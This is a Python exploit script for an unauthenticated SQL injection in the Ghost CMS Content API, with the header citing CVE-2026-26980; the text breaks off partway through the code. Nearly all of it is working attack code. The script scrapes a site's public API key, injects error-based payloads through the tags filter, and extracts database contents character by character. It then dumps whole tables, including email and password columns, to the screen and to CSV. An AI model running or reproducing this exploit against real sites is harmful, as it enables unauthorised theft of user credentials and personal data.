# Exploit Title: Ghost CMS Unauthenticated SQLi via Content API # Exploit Author: vognik # Software Link: https://ghost.org/ # Version: Ghost >= 3.24.0, <= 6.19.0 # Tested on: Ghost 6.16.1 # CVE : CVE-2026-26980 #!/usr/bin/env python3 import requests import re import sys import argparse import textwrap import csv from typing import Optional from concurrent.futures import ThreadPoolExecutor from urllib.parse import urljoin, urlparse CHARSET = "".join(sorted(set("$./0123456789:ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz@!#%^&*()+-="))) ERROR_INDICATOR = "InternalServerError" DEFAULT_API_PATH = "/ghost/api/content/" DEFAULT_THREADS = 15 class GhostExploit: def __init__(self, target_url: str, threads: int = DEFAULT_THREADS, dbms: str = "sqlite", output: str = None, user_cols: str = None, verify: bool = True, manual_key: str = None, manual_path: str = None): self.target = target_url.rstrip('/') self.threads = threads self.dbms = dbms.lower() self.output = output self.user_cols = [c.strip() for c in user_cols.split(',')] if user_cols else None self.session = requests.Session() self.session.verify = verify self.manual_key = manual_key self.manual_path = manual_path if not verify: import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) self.api_key, self.endpoint, self.tag_slug, self.tag_id, self.url_template = "", "", "", "", "" def to_char_hex(self, s: str): if self.dbms == "mysql": return "0x" + "".join([f"{ord(c):02x}" for c in s]) return "||".join([f"char({ord(c)})" for c in s]) def _get_metadata_from_page(self) -> tuple[Optional[str], Optional[str]]: try: r = self.session.get(self.target, timeout=10) r.raise_for_status() key = re.search(r'data-key="([a-f0-9]+)"', r.text) api = re.search(r'data-api="([^"]+)"', r.text) found_key = key.group(1) if key else None found_path = urlparse(api.group(1)).path if api else None return found_key, found_path except Exception: return None, None def discover(self) -> bool: found_key, found_path = None, None if not self.manual_key or not self.manual_path: found_key, found_path = self._get_metadata_from_page() self.api_key = self.manual_key or found_key final_path = self.manual_path or found_path or DEFAULT_API_PATH if not self.api_key: return False self.endpoint = urljoin(self.target, final_path).rstrip('/') + '/' try: test_url = f"{self.endpoint}tags/" r = self.session.get(test_url, params={'key': self.api_key}, timeout=10) r.raise_for_status() json_data = r.json() if 'tags' in json_data and json_data['tags']: tag = json_data['tags'][0] self.tag_slug, self.tag_id = tag['slug'], tag['id'] self.url_template = ( f"{self.endpoint}tags/?key={self.api_key}" f"&filter=slug:['*',{self.tag_slug}]&limit=all" ) return True except Exception: pass return False def check(self, cond: str) -> bool: if self.dbms == "mysql": err_payload = "(SELECT exp(710))" else: err_payload = "(SELECT abs(-9223372036854775808))" payload = f" OR ({cond}) THEN {err_payload} WHEN slug=" try: r = self.session.get(self.url_template.replace("*", payload, 1), timeout=7) return ERROR_INDICATOR.lower() in r.text.lower() except Exception: return False def get_len(self, query: str) -> int: length = 0 for bit in [64, 32, 16, 8, 4, 2, 1]: if self.check(f"LENGTH(({query}))>={length + bit}"): length += bit return length def get_char(self, query: str, pos: int) -> str: low, high = 0, len(CHARSET) - 1 while low < high: mid = (low + high) // 2 char_code = ord(CHARSET[mid + 1]) if self.dbms == "mysql": cond = f"ASCII(SUBSTR(({query}) FROM {pos} FOR 1))>={char_code}" else: prefix = "||".join(["char(63)"] * (pos - 1)) c_range = f"char(91)||char({char_code})||char(45)||char({ord(CHARSET[-1])})||char(93)" cond = f"({query}) GLOB {prefix}||{c_range}||char(42)" if prefix else f"({query}) GLOB {c_range}||char(42)" if self.check(cond): low = mid + 1 else: high = mid return CHARSET[low] def extract(self, query: str, label: str, force_len: int = None) -> str: length = force_len if force_len is not None else self.get_len(query) if length <= 0: return "" chars = [""] * length with ThreadPoolExecutor(max_workers=self.threads) as ex: futures = {ex.submit(self.get_char, query, i+1): i for i in range(length)} for f in futures: chars[futures[f]] = f.result() sys.stdout.write(f"\r {label} ({length} chars): {''.join(c if c else '.' for c in chars)}") sys.stdout.flush() res = "".join(chars) sys.stdout.write(f"\r {label} ({length} chars): {res}\n") return res def print_table(self, columns, rows): if not rows: return widths = {col: len(col) for col in columns} for row in rows: for col in columns: widths[col] = max(widths[col], len(str(row.get(col, "")))) sep = "+" + "+".join(["-" * (widths[col] + 2) for col in columns]) + "+" head = "|" + "|".join([f" {col.ljust(widths[col])} " for col in columns]) + "|" print("\n" + sep) print(head) print(sep) for row in rows: line = "|" + "|".join([f" {str(row.get(col, '')).ljust(widths[col])} " for col in columns]) + "|" print(line) print(sep + "\n") def dump_table(self, table_name: str): print(f"\n[*] Dumping table: {table_name}") cast_type = "CHAR" if self.dbms == "mysql" else "TEXT" count_str = self.extract(f"SELECT CAST(COUNT(*) AS {cast_type}) FROM {table_name}", "Total records") count = int(count_str) if count_str.isdigit() else 0 if count == 0: print("[!] No records found or table doesn't exist.") return if self.user_cols: columns = self.user_cols print(f"[*] Using user-defined columns: {', '.join(columns)}") elif self.dbms == "sqlite": t_name_char = self.to_char_hex(table_name) schema_query = f"SELECT sql FROM sqlite_master WHERE name={t_name_char}" cols_raw = self.extract(schema_query, "Schema") columns = re.findall(r'([a-zA-Z_]+)\s+(?:TEXT|VARCHAR|INT|DATETIME|TIMESTAMP|BOOLEAN)', cols_raw, re.I) else: columns = ['id', 'email', 'name', 'password', 'status'] if not columns: columns = ['id', 'email'] all_rows = [] for i in range(count): print(f"\n --- Record #{i+1} ---") current_row = {} for col in columns: val = self.extract(f"SELECT {col} FROM {table_name} LIMIT 1 OFFSET {i}", col) current_row[col] = val all_rows.append(current_row) self.print_table(columns, all_rows) if self.output: try: with open(self.output, 'w', newline='', encoding='utf-8') as f: writer = csv.DictWriter(f, fieldnames=columns) writer.writeheader() writer.writerows(all_rows) print(f"[+] Exported to {self.output}") except Exception as e: print(f"[!] Export error: {e}") def run_passive_check(self): print(f"[*] Passive check for: {self.target}") try: r = self.session.get(self.target, timeout=10) m = re.search(r'